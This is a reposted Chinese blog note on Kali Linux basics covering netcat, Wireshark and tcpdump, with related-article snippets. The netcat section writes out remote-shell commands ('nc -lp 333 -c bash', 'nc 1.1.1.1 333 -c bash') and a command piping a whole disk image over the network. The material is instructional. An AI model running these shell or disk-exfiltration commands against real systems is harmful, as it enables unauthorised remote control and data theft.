kali--nc,wireshark,tcpdump笔记

最新推荐文章于 2024-05-12 11:19:51 发布
最新推荐文章于 2024-05-12 11:19:51 发布
阅读量117 收藏
点赞数
文章标签: 网络 操作系统 awk
原文链接:http://www.cnblogs.com/neoxblog/p/8997608.html
版权

Kali渗透测试第五章笔记

第五章是基本工具的学习,主要包含了nc,wireshark,tcpdump三个工具的学习这是经常使用的强大工具。

一、     Netcat

Nc –nv 1.1.1.1 110 连接1.1.1.1的110端口

:传输文本信息

Nc –lp 4444 监听4444端口

Nc –nv 1.1.1.1 4444 连接1.1.1.1的4444监听端口

:传输文件/目录

Nc –lp 333 > 1.mp4 #监听333发送1.MP4

Nc –nv 1.1.1.1 333 < 1.mp4 –q 1 #接收1.MP4,接收完毕后1s退出 q:退出

Or

Nc –lp 333 < 1.mp4 –q 1

Nc –nv 1.1.1.1 333 > a.mp4

:传输目录

Tar –cvf –music/ | nc –lp 333 –q 1

Nc –nv 1.1.1.1 333 | tar –xvf –

:流媒体

Cat 1.mp4 | nc –lp 333

Nc –nv 1.1.1.1 333 | mplayer –vo x11 –cache 3000 –

:端口扫描

Nc –nvz 1.1.1.1 1-65535 tcp 端口

Nc –nvzu 1.1.1.1 1-1024  udp 端口

:远程克隆硬盘

Nc –lp 333 | dd of=/dev/sda

Dd if=/dev/sda | nc –nv 1.1.1.1 333 –q -1

:远程控制(windows把bash改成cmd)

Nc –lp 333 –c bash

Nc 1.1.1.1 333

Nc –lp 333

Nc  1.1.1.1 333 –c bash

:nc不能加密缺乏身份认证

解决办法

Ncat –c bash –allow 192.168.191.3 –vnl 333 –ssl

Ncat –nv 1.1.1.1 333 -ssl

 

二、     Wireshark

Wireshark 的使用

启动-选择网卡-混杂模式-实时抓包-分析-首选项

如今的wireshark有中文界面

WireShark 分层显示协议

物理层

数据链路层

网络层 ARP IP

传输层 TCP, UDP, ICMP

会话层

表示层

应用层

 

三、     Tcpdump

:抓包

tcpdump -i eth0 tcp 只抓TCP 包

Tcpdump –i eth0 –s 0 –w file.pcap #tcpdump默认抓取前68个字节,s代表size

:读取抓包

Tcpdump –r file.pcap

:筛选

     tcpdump -A 是以 ASCII 码的形式打印包的详细内容

      - -X 是以 十六进制的形式打印抓包的内容

显示筛选器:

-n 不做域名解析,直接显示IP地址

-r 读文件

awk '{print $3}' 打印第三列

sort -u 去重

tcpdump -n src host 1.1.1.1 -r file.pcap

tcpdump -n dst host 1.1.1.1 -r file.pcap

tcpdump -n tcp src port 80 -r file.pcap

 

转载于:https://www.cnblogs.com/neoxblog/p/8997608.html

weixin_30652879
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
KALI使用】9 TCPDUMP
(∪.∪ )...zzz的博客
09-12 297
gkd学TCPDUMP抓包显示筛选器文档记录工具 TCPDUMP抓包 默认只抓68个字节 tcpdump -i eth0 -s 0 -w a.cap # 抓eth0网卡的 # size 0 表示全部 # w 保存到文件a.cap tcpdump -r a.cap # 查看文件 tcpdump -A -r a.cap # 查看更详细的 tcpdump -i eth0 tcp port 22 # 筛选器,只抓tcp 22端口的 显示筛选器 tcpdump -n -r http.cap | aw
Kali Day06:TCPDUMP
坚持硬核
07-17 182
tcpdump -i eth0 -s 0 -w a.cap -i 即-interface 指定监听哪个网卡 -s即 -size 指定抓包的大小 0表示有多大抓多大,如果不设置默认只抓64个字节 -w表示抓包数据保存在什么地方 输入ctrl+c停止抓包 tcpdump -r a.cap -r即read 表示查看a.cap文件,也就是查看抓到的包 tcpdump -X -r a...
Kali学习笔记3:TCPDUMP详细使用方法
weixin_30640291的博客
05-10 228
Kali自带Wireshark,但一般的Linux系统是不带的,需要自行下载,并且过程略复杂 而纯字符界面的Linux系统无法使用Wireshark 但是,所有Linux系统都会安装TCPDUMP:一种基于命令行的抓包工具 注意事项:默认只抓68字节,能够获得基本信息,但无法做到完整分析 1:开始抓包,-i 参数:eth0网卡,-s 0 表示抓取全部,-w a.cap 表示把抓...
kali 使用tcpdump 抓包分析
qq_41619455的博客
08-12 995
使用tcpdump 在linux 上抓数据包进行分析
kali工具使用】Tcpdump 抓包查看三次握手过程
最新发布
weixin_43822401的博客
05-12 1094
client 主机返回 ACK,包序号为 ack=1 ,这是相对序号,如果需要看绝对序号,可以在 tcpdump。服务器端:SYN-RECEIVED:在收到和发送一个连接请求后等待对方对连接请求的确认。注:Flags [S] 中的 S 表示为 SYN 标志位为 1。服务器端:LISTEN:侦听来自远方的 TCP 端口的连接请求。客户端:SYN-SENT:在发送连接请求后等待匹配的连接请求。客户端/服务器端:ESTABLISHED:代表一个打开的连接。行了,tcp 已经建立连接。指定要抓取的数据包数量。
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2023.3-vmware-amd64.part2.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kail教程(九)—Tcpdump
weixin_43876557的博客
03-02 468
Tcpdump tcpdump不加相应参数默认只抓每个数据的前68个字节。 tcpdump -h #查看相应的参数 #常用命令 tcpdump -i 指定接口 -s 指定抓取数据包大小 -w 将内容保存到该文件 tcpdump -i 指定接口 tcp port 22 :指定抓取tcp协议22端口的数据包 #抓包筛选器 tcpdump -r 文件名 #将刚抓到的数据包数据包读取出来 tcpd...
kali linux抓包教程,kali linux操作系统TCPDUMP详细使用方法
weixin_35782556的博客
05-08 3100
Kali自带Wireshark,但一般的Linux系统是不带的,需要自行下载,并且过程略复杂而纯字符界面的Linux系统无法使用Wireshark但是,所有Linux系统都会安装TCPDUMP:一种基于命令行的抓包工具注意事项:默认只抓68字节,能够获得基本信息,但无法做到完整分析1:开始抓包,-i 参数:eth0网卡,-s 0 表示抓取全部,-w a.cap 表示把抓到的内容放在a.cap文件中...
Kali Linux使用TcpDumpWireshark分析网络数据、arpspoof进行网络欺骗
m0_46028468的博客
07-02 473
当网卡接收到一个网络报文之后,它会遍历系统中所有已经注册的网络协议,例如以太网协议、x25协议处理模块来尝试进行报文的解析处理,这一点和一些文件系统的挂载相似,就是让系统中所有的已经注册的文件系统来进行尝试挂载,如果哪一个认为自己可以处理,那么就完成挂载。tcpdump是基于Unix系统的命令行式的数据包嗅探工具,可以抓取流动在网卡上的数据包。根据网络协议栈的规定,对于报文,即使是目的地是本机,也需要经过本机的网络协议层,所以本机通讯肯定是通过API进入了内核,并且完成了路由选择。使用运算符==来过滤。
kali工具系列:WIRESHARKtcpdump
lm19770429的专栏
04-16 242
抓包引擎 • Libpcap9—— Linux • Winpcap10—— Windows
Kali Linux学习笔记Wiresharknc/ncat对比实验 明文传输和密文传输
weixin_43653897的博客
11-18 729
wiresharknc/ncat实验 实验内容: 通过wireshark抓包内容测试 ncncat的保密性。nc的弱点在于明文传输,无法保证信息安全,而ncat是密文传输。 实验环境: kali linux-32bit IP:172.16.2.64 kali linux-64bit IP:172.16.2.63 下载 ncncat apt-get install nc apt-get install ncat wireshark+nc 1)在kali linu-32b
kali 克隆网页_【原创】使用Httrack克隆网站
weixin_39774808的博客
12-20 670
HTTrack Website Copier是一个免费并易于使用的线下浏览器工具,它能够让你从互联网上下载整个网站进行线下浏览.浏览线下站点和线上并没有什么不同.HTTrack同样可以进行线下线上站点同步,支持断点续传.HTTrack是一个可全面配置并包括全面的帮助系统的工具.HTTrack创建的克隆镜像站点能够帮助渗透测试人员在对网站进行渗透测试时处于完全可控的状态,更清晰地了解Web应用程序的...
kali-权限提升】(4.2.2)社会工程学工具包:web站点克隆钓鱼
08-07 850
【社会工程学工具包】web站点克隆钓鱼
制作钓鱼网站(克隆网站)
热门推荐
墨痕诉清风的博客
01-24 2万+
克隆网站
Kali渗透测试:网络数据的嗅探与欺骗
Liu_Bruce的博客
05-23 8454
Kali渗透测试:网络数据的嗅探与欺骗 无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理。 另外,很多网络攻击的方法也都是发送精心构造的数据包来完成的, 如常见的ARP欺骗。利用这种欺骗方式,黑客可以截获受害计算机与外部通信的全部数据,如受害者登录使用的用户名与密码、发送的邮件等。 “The quieter you are the more you are able to hear”(你越安静,你能听到的越多)。如使用HTTP、FTP
kali-everything 安装
09-06
要安装kali-everything,可以使用以下解决方案:首先,使用命令"apt-get install kali-tools-top10"来安装kali的前十工具。接下来,使用命令"sudo apt-get install kali-linux-everything"来安装kali的所有软件包。这将确保你安装了kali-linux的每一个组件和工具。你也可以通过下载"kali-linux-2022.3-installer-everything-amd64.iso.torrent"文件,并使用相应的软件来进行安装。另外,你还可以使用命令"sudo apt-get install kali-linux-top10"或"sudo apt-get install kali-linux-all"来安装kali的前十工具或所有软件包。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [解决kali 安装kali-linux-all失败](https://blog.csdn.net/Thea_1207/article/details/122210373)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [kali-linux-2022.3-installer-everything-amd64.iso.torrent](https://download.csdn.net/download/qq_73689812/86537708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值